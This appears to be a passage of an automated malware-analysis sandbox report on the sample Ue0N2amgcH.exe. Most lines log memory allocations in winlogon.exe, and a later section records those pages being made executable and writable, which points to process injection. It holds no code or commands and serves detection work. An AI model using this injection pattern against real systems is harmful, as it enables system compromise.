Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF94000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF96000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CFA0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CFA0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CFA1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CFB2000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CFB4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CFB6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CFC0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CFC0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CFC1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CFD2000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CFD4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CFD6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CFE0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CFE0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CFE1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CFF2000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CFF4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CFF6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D000000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D000000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D001000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D012000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D014000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D016000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D020000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D020000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D021000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D032000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D034000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D036000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D040000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D040000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D041000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D052000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D054000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D056000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D060000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D060000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D061000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D072000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D074000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D076000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D080000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D080000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D081000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D092000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D094000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D096000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D0A0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D0A0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D0A1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D0B2000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D0B4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D0B6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D0C0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D0C0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D0C1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D0D2000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D0D4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D0D6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D0E0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D0E0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D0E1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D0F2000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D0F4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D0F6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D100000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D100000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D101000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D112000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D114000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D116000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D120000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D120000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D121000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D132000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D134000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D136000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D140000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D140000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D141000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D152000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D154000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D156000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D160000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D160000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D161000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D172000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D174000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D176000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D180000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D180000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D181000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D192000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D194000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D196000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D1A0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D1A0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D1A1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D1B2000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D1B4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D1B6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D1C0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D1C0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D1C1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D1D2000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D1D4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D1D6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D1E0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D1E0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D1E1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D1F2000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D1F4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D1F6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D200000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D200000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D201000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D212000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D214000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D216000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D220000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D220000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D221000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D232000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D234000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D236000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D240000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D240000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D241000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D252000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D254000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D256000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D260000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D260000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D261000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D272000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D274000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D276000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D280000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D280000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D281000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D292000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D294000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D296000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D2A0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D2A0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D2A1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D2B2000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D2B4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D2B6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D2C0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D2C0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D2C1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D2D2000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D2D4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D2D6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D2E0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D2E0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D2E1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D2F2000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D2F4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D2F6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D300000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D300000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D301000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D312000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D314000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D316000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D320000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D320000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D321000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D332000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D334000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D336000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D340000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D340000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D341000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D352000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D354000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D356000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D360000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D360000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D361000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D372000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D374000 protect: page read and writeJump to behavior
Changes memory attributes in foreign processes to executable or writableShow sources
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: 400000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: 401000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: 412000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: 414000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: 416000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: C940000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: C941000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: C952000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: C954000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: C956000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: C960000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: C961000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: C972000 protect: page execute and read and writeJump to behavior
